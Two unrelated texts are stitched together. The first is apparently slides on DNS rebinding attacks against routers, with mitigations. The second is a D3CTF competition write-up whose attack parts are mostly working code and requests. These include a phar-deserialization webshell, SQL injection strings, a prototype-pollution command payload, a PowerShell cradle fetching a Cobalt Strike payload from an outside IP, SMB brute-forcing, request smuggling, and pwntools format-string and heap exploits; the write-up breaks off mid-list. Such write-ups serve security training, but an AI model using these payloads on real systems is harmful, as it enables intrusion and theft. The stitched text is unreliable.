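The failover behavior this attack relies on can be sketched as follows (a simplified model; real browsers add timeouts and address sorting):

```python
def connect_first_alive(addresses, try_connect):
    # A browser holding multiple A records tries each address in order,
    # moving on when a connection attempt fails (e.g. a TCP RST)
    for addr in addresses:
        if try_connect(addr):
            return addr
    return None

# Once the attacker's server starts refusing connections,
# the browser falls through to the target's public IP
alive = {"2.3.5.8"}
chosen = connect_first_alive(["1.4.1.4", "2.3.5.8"], lambda a: a in alive)
```

`try_connect` stands in for an actual TCP connect; the point is only the ordered fall-through between A records.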
Rebinding to a Public IP
1.4.1.4
2.3.5.8
Target IP:
2.3.5.8
Attacker IP:
1.4.1.4
Attacker Domain:
attacker.com
Rebinding to a Public IP
1.4.1.4
2.3.5.8
What is the IP address for
attacker.com?
Rebinding to a Public IP
1.4.1.4
2.3.5.8
1.4.1.4
2.3.5.8
Rebinding to a Public IP
1.4.1.4
2.3.5.8
GET / HTTP/1.1
Host: attacker.com
Rebinding to a Public IP
1.4.1.4
2.3.5.8
<script>…</script>
Rebinding to a Public IP
1.4.1.4
2.3.5.8
GET / HTTP/1.1
Host: attacker.com
Rebinding to a Public IP
1.4.1.4
2.3.5.8
TCP RST
Rebinding to a Public IP
1.4.1.4
2.3.5.8
GET / HTTP/1.1
Host: attacker.com
Rebinding to a Public IP
1.4.1.4
2.3.5.8
<html>…</html>
Rebinding to a Private IP
1.4.1.4
Target IP:
192.168.1.1
Attacker IP:
1.4.1.4
Attacker Domain:
attacker.com
192.168.1.1
Rebinding to a Private IP
1.4.1.4
What is the IP address for
attacker.com?
192.168.1.1
Rebinding to a Private IP
1.4.1.4
1.4.1.4
192.168.1.1
192.168.1.1
Rebinding to a Private IP
1.4.1.4
GET / HTTP/1.1
Host: attacker.com
192.168.1.1
Rebinding to a Private IP
1.4.1.4
<html>…</html>
192.168.1.1
Services Bound to All Interfaces
# netstat –l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:80 *:* LISTEN
tcp 0 0 *:53 *:* LISTEN
tcp 0 0 *:22 *:* LISTEN
tcp 0 0 *:23 *:* LISTEN
Firewall Rules Based on Interface Names
-A INPUT -i eth0 -j DROP
-A INPUT -j ACCEPT
IP Stack Implementations
RFC 1122 defines two IP models:
Strong End System Model
Weak End System Model
The Weak End System Model
RFC 1122, Weak End System Model:
A host MAY silently discard an incoming datagram whose
destination address does not correspond to the physical
interface through which it is received.
A host MAY restrict itself to sending (non-source-routed) IP
datagrams only through the physical interface that corresponds
to the IP source address of the datagrams.
Weak End System Model
eth1
192.168.1.1
eth0
2.3.5.8
Weak End System Model
TCP SYN Packet
Source IP: 192.168.1.100
Destination IP: 2.3.5.8
Destination Port: 80
eth1
192.168.1.1
eth0
2.3.5.8
Weak End System Model
TCP SYN/ACK Packet
Source IP: 2.3.5.8
Destination IP: 192.168.1.100
Source Port: 80
eth1
192.168.1.1
eth0
2.3.5.8
Weak End System Model
TCP ACK Packet
Source IP: 192.168.1.100
Destination IP: 2.3.5.8
Destination Port: 80
eth1
192.168.1.1
eth0
2.3.5.8
Traffic Capture
End Result
Public IP Rebinding Attack
1.4.1.4
Target IP:
2.3.5.8
Attacker IP:
1.4.1.4
Attacker Domain:
attacker.com
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
What is the IP address for
attacker.com?
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
1.4.1.4
2.3.5.8
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
GET / HTTP/1.1
Host: attacker.com
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
<script>...</script>
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
GET / HTTP/1.1
Host: attacker.com
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
TCP RST
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
GET / HTTP/1.1
Host: attacker.com
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
<html>…</html>
2.3.5.8
Public IP Rebinding Attack
Pros:
Nearly instant rebind, no delay or waiting period
Don’t need to know router’s internal IP
Works in all major browsers: IE, FF, Opera, Safari, Chrome
Cons:
Router must meet very specific conditions
Must bind Web server to the WAN interface
Firewall rules must be based on interface names, not IP addresses
Must implement the weak end system model
Not all routers are vulnerable
Affected Routers
Asus
Belkin
Dell
Thompson
Linksys
Third Party Firmware
ActionTec
Making the Attack Practical
To make the attack practical:
Must obtain target’s public IP address automatically
Must coordinate services (DNS, Web, Firewall)
Must do something useful
Tool Release: Rebind
Provides all necessary services
DNS, Web, Firewall
Serves up JavaScript code
Limits foreground activity
Makes use of cross-domain XHR, if supported
Supports all major Web browsers
Attacker can browse target routers in real-time
Via a standard HTTP proxy
Rebind
2.3.5.8
1.4.1.4
Target IP: 2.3.5.8
Rebind IP: 1.4.1.4
Attacker Domain: attacker.com
Rebind
Rebind
Rebind
2.3.5.8
1.4.1.4
What is the IP address for
attacker.com?
Rebind
2.3.5.8
1.4.1.4
1.4.1.4
Rebind
2.3.5.8
1.4.1.4
GET /init HTTP/1.1
Host: attacker.com
Rebind
2.3.5.8
1.4.1.4
Location: http://wacme.attacker.com/exec
Rebind
2.3.5.8
1.4.1.4
What is the IP address for
wacme.attacker.com?
Rebind
2.3.5.8
1.4.1.4
1.4.1.4
2.3.5.8
Rebind
2.3.5.8
1.4.1.4
GET /exec HTTP/1.1
Host: wacme.attacker.com
Rebind
2.3.5.8
1.4.1.4
<script>…</script>
Rebind
2.3.5.8
1.4.1.4
GET / HTTP/1.1
Host: wacme.attacker.com
Rebind
2.3.5.8
1.4.1.4
TCP RST
Rebind
2.3.5.8
1.4.1.4
GET / HTTP/1.1
Host: wacme.attacker.com
Rebind
2.3.5.8
1.4.1.4
<html>…</html>
Rebind
2.3.5.8
1.4.1.4
GET /poll HTTP/1.1
Host: attacker.com:81
Rebind
2.3.5.8
1.4.1.4
Rebind
Rebind
2.3.5.8
1.4.1.4
GET http://2.3.5.8/ HTTP/1.1
Rebind
2.3.5.8
1.4.1.4
GET /poll HTTP/1.1
Host: attacker.com:81
Rebind
2.3.5.8
1.4.1.4
GET / HTTP/1.1
Rebind
2.3.5.8
1.4.1.4
GET / HTTP/1.1
Host: wacme.attacker.com
Rebind
2.3.5.8
1.4.1.4
<html>…</html>
Rebind
2.3.5.8
1.4.1.4
POST /exec HTTP/1.1
Host: attacker.com:81
<html>…</html>
Rebind
2.3.5.8
1.4.1.4
<html>…</html>
Rebind
Demo
More Fun With Rebind
Attacking SOAP services
UPnP
HNAP
We can rebind to any public IP
Proxy attacks to other Web sites via your browser
As long as the site doesn’t check the host header
DNS Rebinding Countermeasures
Am I Vulnerable?
End-User Mitigations
Break any of the attack’s conditions
Interface binding
Firewall rules
Routing rules
Disable the HTTP administrative interface
Reduce the impact of the attack
Basic security precautions
Blocking Attacks at the Router
Don’t bind services to the external interface
May not have sufficient access to the router to change this
Some services don’t give you a choice
Re-configure firewall rules
-A INPUT -i eth1 -d 172.69.0.0/16 -j DROP
HTTP Administrative Interface
Disable the HTTP interface
Use HTTPS / SSH
Disable UPnP while you’re at it
But be warned…
Enabling HTTPS won’t disable HTTP
In some routers you can’t disable HTTP
Some routers have HTTP listening on alternate ports
In some routers you can’t disable HNAP
Blocking Attacks at the Host
Re-configure firewall rules
-A INPUT -d 172.69.0.0/16 -j DROP
Configure dummy routes
route add -net 172.69.0.0/16 gw 127.0.0.1
Basic Security Precautions
Change your router’s default password
Keep your firmware up to date
Don’t trust un-trusted content
Vendor / Industry Solutions
Fix the same-origin policy in browsers
Implement the strong end system model in routers
Build DNS rebinding mitigations into routers
Conclusion
DNS rebinding still poses a threat to your LAN
Tools are available to exploit DNS rebinding
Only you can prevent forest fires
Q & A
Rebind project
http://rebind.googlecode.com
Contact
[email protected]
References
Java Security: From HotJava to Netscape and Beyond
http://www.cs.princeton.edu/sip/pub/oakland-paper-96.pdf
Protecting Browsers From DNS Rebinding Attacks
http://crypto.stanford.edu/dns/dns-rebinding.pdf
Design Reviewing the Web
http://www.youtube.com/watch?v=cBF1zp8vR9M
Intranet Invasion Through Anti-DNS Pinning
https://www.blackhat.com/presentations/bh-usa-
07/Byrne/Presentation/bh-usa-07-byrne.pdf
Anti-DNS Pinning Demo
http://www.jumperz.net/index.php?i=2&a=3&b=3
References
Same Origin Policy
http://en.wikipedia.org/wiki/Same_origin_policy
RFC 1122
http://www.faqs.org/rfcs/rfc1122.html
Loopback and Multi-Homed Routing Flaw
http://seclists.org/bugtraq/2001/Mar/42
TCP/IP Illustrated Volume 2, W. Richard Stevens
p. 218 – 219 | pdf |
D3CTF Writeup
Author:Nu1L
Web
ezupload
First write an .htaccess so that uploaded files can be executed as scripts:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------030808716877952631606047
User-Agent: PostmanRuntime/7.20.1
Accept: */*
Cache-Control: no-cache
Postman-Token: aeee478c-f649-433f-b007-6799bb3db9f2
Host: cdc673a649.ezupload.d3ctf.io
Accept-Encoding: gzip, deflate
Content-Length: 443
Connection: close
----------------------------030808716877952631606047
Content-Disposition: form-data; name="action"
upload
----------------------------030808716877952631606047
Content-Disposition: form-data; name="url"
data:image/png;base64,QWRkSGFuZGxlciBwaHA3LXNjcmlwdCAudHh0
----------------------------030808716877952631606047
Content-Disposition: form-data; name="filename"
.htaccess
----------------------------030808716877952631606047--
Then use deserialization to write a script into a file.
First, locate the directory:
<?php
$d1 = new dir("test", "testdd");
$d1->userdir = '../';
$d2 = new dir("url", "filename");
$d2->filename = "upload/3535fc06ad2b768f8f2f752376f94f14/test3";
$d2->userdir = $d1;
// echo serialize($d2);
$phar = new Phar("1.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"." __HALT_COMPILER(); ");
// add a GIF file header
$phar->setMetadata($d2);
$phar->addFromString("test.jpg","test");
$phar->stopBuffering();
To bypass content inspection, the phar is additionally gzip-compressed.
Trigger it.
Then a second script writes the webshell into the file, again compressed to evade detection:
<?php
$d3 = new dir("test", "testdd");
$d3->userdir = '<?php eval($_REQUEST[122]); phpinfo();';
$d3->filename = '/var/www/html/a57ecd54d4df7d99/upload/3535fc06ad2b768f8f2f752376f94f14/test3';
$phar = new Phar("2.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"." __HALT_COMPILER(); ");
// add a GIF file header
$phar->setMetadata($d3);
$phar->addFromString("test.jpg","test");
$phar->stopBuffering();
phpinfo reveals open_basedir=/var/www/html.
Bypass it and read the flag:
ini_set('open_basedir', '..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
ini_set('open_basedir', '/');
var_dump(scandir('/'));
echo file_get_contents('F1aG_1s_H4r4');
// d3ctf{C0n9rAtul4t1ons_Y0u_9ot_1t}
Novelty: the .htaccess AddHandler trick is not limited to application/x-httpd-php.
ezts
Built on the KOA framework (https://github.com/koajs/koa) with
https://github.com/d-band/koa-orm
Having identified the library, we went for SQL injection:
http://df8aea7e00.ezts.d3ctf.io/search?key=1'))%20or%20((%271&value=1
http://df8aea7e00.ezts.d3ctf.io/search?key=1'))%20or%201%23&value=1
http://df8aea7e00.ezts.d3ctf.io/search?key=1'))%20or%20(ascii(substr((select%20version()),1,1))%3E10)%23&value=1
A script brute-forces the characters, yielding:
admin 47ada0f1c8e3d8c3
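A typical extraction loop for this kind of boolean-blind injection binary-searches each character's code point. A sketch with a stand-in oracle (in the real attack the oracle would issue the `ascii(substr(...)) > N` query shown above):

```python
def extract_char(oracle, pos):
    # Binary search over printable ASCII using a boolean oracle:
    # oracle(pos, mid) answers "is ascii(substr(secret, pos+1, 1)) > mid ?"
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(pos, mid):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)

# Stand-in oracle over a known value, for demonstration only
secret = "47ada0f1c8e3d8c3"
oracle = lambda pos, mid: ord(secret[pos]) > mid
recovered = "".join(extract_char(oracle, i) for i in range(len(secret)))
```

Seven queries per character suffice, versus ~95 for a linear scan.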
Prototype pollution
Log into the admin panel and set any user's data to:
{"constructor":{"prototype":{"outputFunctionName":"a; return global.process.mainModule.constructor._load('child_process').execS
/flag is owned by root with mode 400; we are the node user, so privilege escalation is needed.
Linux 8c6231193dc6 4.15.0-54-generic #58-Ubuntu SMP Mon Jun 24 10:55:24 UTC 2019 x86_64 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 9.11 (stretch)
Release: 9.11
Codename: stretch
$ gcc --version
gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
$ ldd --version
ldd (Debian GLIBC 2.24-11+deb9u4) 2.24
CVE-2019-14287
easyweb
admin admin
Hi, admin, hope you have a good experience in this ctf game. You must get an RCE bug in this challenge.
Docs: https://codeigniter.org.cn/user_guide/general/controllers.html
// controllers/user.php
public function index()
{
if ($this->session->has_userdata('userId')) {
$userView = $this->Render_model->get_view($this->session->userId);
$prouserView = 'data:,' . $userView;
$this->username = array('username' => $this->getUsername($this->session->userId));
$this->ci_smarty->assign('username', $this->username);
$this->ci_smarty->display($prouserView);
} else {
redirect('/user/login');
}
}
// models/render_model.php
public function get_view($userId){
$res = $this->db->query("SELECT username FROM userTable WHERE userId='$userId'")->result();
if($res){
$username = $res[0]->username;
$username = $this->sql_safe($username);
$username = $this->safe_render($username);
$userView = $this->db->query("SELECT userView FROM userRender WHERE username='$username'")->result();
$userView = $userView[0]->userView;
return $userView;
}else{
return false;
}
}
private function safe_render($username){
$username = str_replace(array('{','}'),'',$username);
return $username;
}
private function sql_safe($sql){
if(preg_match('/and|or|order|delete|select|union|load_file|updatexml|\(|extractvalue|\)/i',$sql)){
return '';
}else{
return $sql;
}
}
Adding { } inside the SQL payload bypasses sql_safe, and the resulting username is then rendered as a template:
testuser123' uni{on sel{ect 0x6c616c616c61 limit 1,1 -- -
public function index()
{
if ($this->session->has_userdata('userId')) {
$userView = $this->Render_model->get_view($this->session->userId);
$prouserView = 'data:,' . $userView;
$this->username = array('username' => $this->getUsername($this->session->userId));
$this->ci_smarty->assign('username', $this->username);
$this->ci_smarty->display($prouserView);
} else {
redirect('/user/login');
}
}
https://www.smarty.net/docs/zh_CN/index.tpl
select hex('{{$smarty.version}}')
123' unio{n se{lect 0x7B7B24736D617274792E76657273696F6E7D7D limit 1,1 -- -
We still need to escape the sandbox.
Function whitelist:
public $php_functions = array('isset', 'empty', 'count', 'sizeof', 'in_array', 'is_array', 'time',);
Presumably built-in methods are required, orz.
123' unio{n se{lect
0x7B7B7068707D7D696E636C75646528272F746D702F64643861656634666635656566383462356232363262653
limit 1,1 -- -
Including the uploaded webshell via the {php} tag bypasses the sandbox.
(Unintended solution.)
d3ctf{Th4at's_A_Si11y_P0p_chi4n}
fake onelinephp
A leaked .git yields two files: 1. hint1.txt 2. index.php
hint1.txt:
GitHack?
Naiiiive!
index.php:
Right. But it is unreachable now =.= 404.
Refreshing three times gave a 404, a 502, and one normal highlight_file run, so some kind of feature?
Right... what is this for...
Presumably to prevent race conditions, blocking the original one-liner solution.
There are other files in the .git leak:
dict.txt
10.23 🌞
👴's memory is bad, so 👴 hid the password on some line in here; 👴 only needs to remember one line number, but you can't :)
Still I can't remember my longlonglong password,
so I created a dictionary to hide my password (you are looking right at it).
Now a line number is all I need to remember to retrieve my password, while you can't =w=
Nx9MEEAcWUt6PrS
mB5cvz9U0lolxel
8NrWdcUvbABVraV
HEjSwTpsJZclu8M
Cn0rQ7dxJuW3vBQ
......
hint2.txt
10.24 🌧
This 💻 runs the web service. To stop big hackers from pwning my box with an nginx 0day and grabbing the flag, 👴 moved the flag to a 💻 on the intranet (172.19.97.8 C:\Users\Administrator\Desktop\flag.txt).
👴's memory is bad, so one password rules them all; surely you hackers can't steal my account 🌶?
In case you H4ck3rs use nginx 0day to pwn this computer, I put the flag on
172.19.97.8 C:\Users\Administrator\Desktop\flag.txt
I'm not good at remembering passwords, so all my passwords are the same.
I doubt that you can ever find the password, so I'm all good, I think.
Go straight to Cobalt Strike: choose the stageless PowerShell payload, host it on the C2, and download-and-execute it via psh to bypass AV.
system("powershell.exe -nop -w hidden -c \"IEX ((new-object
net.webclient).downloadstring('http://47.95.251.134:8080/download/file.ps1'))\"");
Then package and upload Hydra, build a dictionary from the hint passwords, and brute-force the local SMB service:
hydra -l w1nd -P pass.txt smb://172.19.97.4
With the cracked password, Make Token and take over the second machine:
make_token .\administrator eDHU27TlY6ugslV
shell type \\172.19.97.8\C$\Users\ADministrator\Desktop\flag.txt
d3ctf{Sh3ll_fr0m_ur1111_inc1ude!1!!!_soCoooool}
Showhub
Description
Showhub is a fashion-focused community built on a self-developed framework.Download this framework here
Notice:scanner is useless
Challenge Address
http://ec057b43d9.showhub.d3ctf.io
At registration the SQL statement is built with sprintf; %1$\' can be used to format out a single quote, leading to an INSERT injection.
smi1e12345%1$',%1$'4a451ff953e28b3ba4f366ab2147ce99e8a3254502f53bda1bc578dfece79c6c%1$')#
Log in as smi1e12345 / smi1esmi1e.
smi1e123%1$',(if(1,sleep(3),1)))# enables blind injection, but the admin password is sha256-hashed, so extracting it is useless.
So we have to overwrite the admin password instead, using ON DUPLICATE KEY UPDATE: inserting an already-existing record executes the UPDATE.
Register with the following as the username (any password):
admin%1$',%1$'password%1$') ON DUPLICATE KEY UPDATE password=%1$'7e6e0c3079a08c5cc6036789b57e951f65f82383913ba1a49ae992544f1b4b
This resets the admin password: admin / testpass123.
Once logged in, the client source IP must be an intranet IP; every IP-spoofing request header failed.
Then we noticed Server: ATS/7.1.2; searching showed this version is vulnerable to request smuggling:
https://mengsec.com/2019/10/10/http-request-smugging/
The test environment in that article closely matches the challenge.
Finally, CL.TE request smuggling finishes the job:
POST / HTTP/1.1
Host: ec057b43d9.showhub.d3ctf.io
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=uaoq5ec3gnqtadteh4ejf1pdt8§§
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 658
Transfer-Encoding: chunked
0
POST /WebConsole/exec HTTP/1.1
Host: ec057b43d9.showhub.d3ctf.io
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://ec057b43d9.showhub.d3ctf.io/WebConsole/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=uaoq5ec3gnqtadteh4ejf1pdt8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
cmd=cat+/flag&a=
Pwn
knote
The whole filesystem is rwx....
/ $ rm /bin/umount
rm /bin/umount
/ $ echo '#!/bin/sh' > /bin/umount
echo '#!/bin/sh' > /bi[ 23.319387] random: fast init done
n/umount
/ $ echo '/bin/sh' >> /bin/umount
echo '/bin/sh' >> /bin/umount
/ $ chmod +x /bin/umount
chmod +x /bin/umount
/ $ exit
exit
/bin/sh: can't access tty; job control turned off
/ # cat /flag
cat /flag
d3ctf{mutli_thread_JO00p_Ro0op}/ #
unprintableV
The classic printf chain on the stack gives arbitrary stack writes.
The stack layout happens to allow a csu_init-style gadget chain.
r12 points into .bss... stdin lives in .bss... so an open can probably be arranged?
The stdout pointer can be redirected to stderr to leak the output.
from pwn import *
#p = process('./unprintableV')
p = remote('212.64.44.87', 12604)
p.recvuntil('here is my gift: 0x')
stack = int(p.recv(12),16)
print hex(stack)
p.recvuntil('may you enjoy my printf test!')
buf_ptr = stack
pay1 = "%"+str(buf_ptr&0xff)+"c%6$hhn"
print pay1
p.send(pay1.ljust(300,'\x00'))
pay2 = "%32c%10$hhn"
p.send(pay2.ljust(300,'\x00'))
pay3 = "%1664c%9$hn"
p.send(pay3.ljust(300,'\x00'))
p.sendline("%15$p%14$p\x00")
p.recvuntil("0x")
addr = int(p.recv(12),16)
print hex(addr)
p.recvuntil("0x")
addr2 = int(p.recv(12),16)
print hex(addr2)
libc_base = addr - (0x7f73b7bddb97-0x7f73b7bbc000)
sh = libc_base +1785498
gets = libc_base + 524464
base = addr2 - (0x00055B74A2C6B60-0x00055B74A2C6000)
b_pop_rdi = base+0x0000000000000bc3
pop_rdi = libc_base + 0x000000000002155f
pop_rsi = libc_base + 0x0000000000023e6a
pop_rdx = libc_base + 0x0000000000001b96
pop_rcx = libc_base + 0x000000000003eb0b
pop_rax = libc_base + 0x00000000000439c8
syscall = libc_base + 0x00000000000d2975
pay4 = "%"+str((buf_ptr+0x18+1)&0xff)+"c%6$hhnHOMURA"
print pay4
p.send(pay4+'\x00\n')
p.recvuntil('HOMURA')
pay5 = "%"+str((buf_ptr >> 8)&0xff)+"c%10$hhnHOMURA"
p.send(pay5+'\x00\n')
p.recvuntil('HOMURA')
pay6 = "%"+str((buf_ptr+0x20)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((gets)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
pay6 = "%"+str((buf_ptr+0x20 +1)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((gets >> 8)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
pay6 = "%"+str((buf_ptr+0x20 +2)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((gets >> 16)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
pay6 = "%"+str((buf_ptr+0x20 +3)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((gets >> 24)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
pay6 = "%"+str((buf_ptr+0x20 +4)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((gets >> 32)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
pay6 = "%"+str((buf_ptr+0x20 +5)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((gets >> 40)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
#gets ok
pay6 = "%"+str((buf_ptr+0x10)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((195)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
last = 'd^3CTF'.ljust(0x10,'\x00')
last += "flag"
p.send(last.ljust(300,'\x00'))
#0x000000000002155f : pop rdi ; ret
#0x0000000000023e6a : pop rsi ; ret
#0x0000000000001b96 : pop rdx ; ret
#0x000000000003eb0b : pop rcx ; ret
#0x00000000000439c8 : pop rax ; ret
#0x00000000000d2975 : syscall ; ret
#0x0000000000155fc6 : pop r8 ; mov eax, 1 ; ret
pop_r8 = libc_base +0x0000000000155fc6
rop = p64(pop_rdi)
rop +=p64(base+0x202070)
rop +=p64(pop_rsi)
rop +=p64(0)
rop +=p64(pop_rdx)
rop +=p64(0)
rop +=p64(pop_rax)
rop +=p64(2)
rop +=p64(syscall)
#open
rop +=p64(pop_rdi)
rop +=p64(1)
rop +=p64(pop_rsi)
rop +=p64(base+0x202080)
rop +=p64(pop_rdx)
rop +=p64(100)
rop +=p64(pop_rax)
rop +=p64(0)
rop +=p64(syscall)
#read
rop +=p64(pop_rdi)
rop +=p64(2)
rop +=p64(pop_rsi)
rop +=p64(base+0x202080)
rop +=p64(pop_rdx)
rop +=p64(100)
rop +=p64(pop_rax)
rop +=p64(1)
rop +=p64(syscall)
#write
p.sendline('a'*24+rop)
p.interactive()
new_heap
getchar() allocates a 0x1000 chunk.
from pwn import *
ru = lambda x: p.recvuntil(x, drop = True)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)
def alloc(size,cnt):
sa("3.exit\n",str(1).ljust(0x7,'\x00'))
sa("size:",str(size).ljust(0x7,'\x00'))
sa("content:",cnt)
def free(idx):
sa("3.exit\n",str(2).ljust(0x7,'\x00'))
sa("index:",str(idx).ljust(0x7,'\x00'))
ru("done\n")
def qu(byte):
sa("3.exit\n",str(3).ljust(0x7,'\x00'))
sa("sure?\n",byte)
def exp():
try:
global p
# p = process("./new_heap",env={"LD_PRELOAD":"./libc.so.6"})
HOST,PORT = '49.235.24.33','20201'
p = remote(HOST,PORT)
libc = ELF("./libc.so.6")
ru("friends:0x")
byte = int(ru('\n'),16)-0x2
log.info('byte:'+hex(byte))
alloc(0x78,'0'*0x78)
alloc(0x78,'1'*0x78)
alloc(0x78,'2'*0x78)
alloc(0x78,'3'*0x78) #3
alloc(0x78,'\x00'*0x58+p64(0x81)) #5
alloc(0x38,'5'*0x38) #5
alloc(0x78,'\x00'*0x18+p64(0x61)) #7
alloc(0x78,'7'*0x70) #8
alloc(0x78,'8'*0x70) #8
free(0)
free(1)
free(2)
free(3)
free(4)
free(6)
free(7)
free(8)
alloc(0x78,'\x00'*0x28+p64(0x51)) #10
free(8)
alloc(0x78,'\xb0'+chr(byte+0x4)) #11
ru("done\n")
qu('\xe1')
free(5)
alloc(0x18,'x'*0x18) #12
ru("done\n")
alloc(0x8,'\x50\x77') #13
ru("done\n")
alloc(0x38,'\n') #14
ru("done\n")
alloc(0x38,2*p64(0)+p64(0xfbad1800)+p64(0)*3+p8(0)) #15
p.recv(8)
libc.address = u64(p.recv(8))-0x3b5890
log.info("libc.address:"+hex(libc.address))
system = libc.sym['system']
if libc.address<0x700000000000 or libc.address>0x800000000000:
return
p.close()
log.info('system:'+hex(system))
__free_hook = libc.sym['__free_hook']
log.info('__free_hook:'+hex(__free_hook))
ru("done\n")
sla("size:",str(0x38))
sa("content:",3*p64(0)+p64(0x81)+p64(libc.sym['__free_hook']))
ru("done\n")
p.sendline(str(1))
sla("size:",str(0x78))
sa("content:","/bin/sh\x00")
ru("done\n")
p.sendline(str(1))
sla("size:",str(0x78))
sa("content:",p64(libc.sym['system']))
ru("done\n")
p.sendline(str(2))
sla("index:",str(16))
p.interactive()
except EOFError:
return
if __name__ == "__main__":
'''
1/16
d3ctf{nEW-p@Rad!se-but-noT_pERfeCT}
'''
while True:
exp()
p.close()
RE
Ancient Game V2
https://d3ctf-rev-1256301804.cos.ap-shanghai.myqcloud.com/dddb4cc54c/chall_2d7cf6eb61.html
程序第⼀步把输⼊和t做了fun函数实现的运算,t和flag似乎很接近...
t = [98, 52, 96, 118, 98, 122, 80, 118, 32, 53, 106, 82, 68, 98, 121, 93, 64, 64, 125, 89, 114, 121, 125,
71, 122, 55, 54, 74, 51, 74, 51, 55, 52, 54, 79, 51, 98, 48, 109, 96, 58, 71, 99, 50, 71, 58, 102,
def nand(a, b):
return ~(a & b)
def fun(a, b):
t1 = nand(b, b)
t2 = nand(a, t1)
t3 = nand(a, a)
t4 = nand(b, t3)
return nand(t4, t2)
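It helps to notice what the NAND network actually computes: expanding `nand(t4, t2)` with De Morgan gives `(b & ~a) | (a & ~b)`, i.e. `fun(a, b)` is bitwise XOR. This can be verified exhaustively:

```python
def nand(a, b):
    return ~(a & b)

def fun(a, b):
    # ~(~(b & ~a) & ~(a & ~b)) == (b & ~a) | (a & ~b) == a ^ b
    t1 = nand(b, b)
    t2 = nand(a, t1)
    t3 = nand(a, a)
    t4 = nand(b, t3)
    return nand(t4, t2)

all_xor = all(fun(a, b) == a ^ b for a in range(64) for b in range(64))
```

So the first stage XORs the input against t, which is why t "looks close to the flag".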
Symbolize nand by hand:
function nand(a, b){
if(a === b)
{
if(typeof(a) == "string")
{
return '~' + a;
}
else
{
return ~a;
}
}
if(typeof(a) == "string")
{
return 'nand(' + a + ',' + b + ')';
}
if(typeof(b) == "string")
{
return 'nand(' + a + ',' + b + ')';
}
return ~(a & b);
}
This exposes the later checks:
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-1),nand(0,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-2),nand(1,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-3),nand(2,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-4),nand(3,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-5),nand(4,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-6),nand(5,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-7),nand(6,~nand(nand(input0,-99),nand(98,~input0))))
0
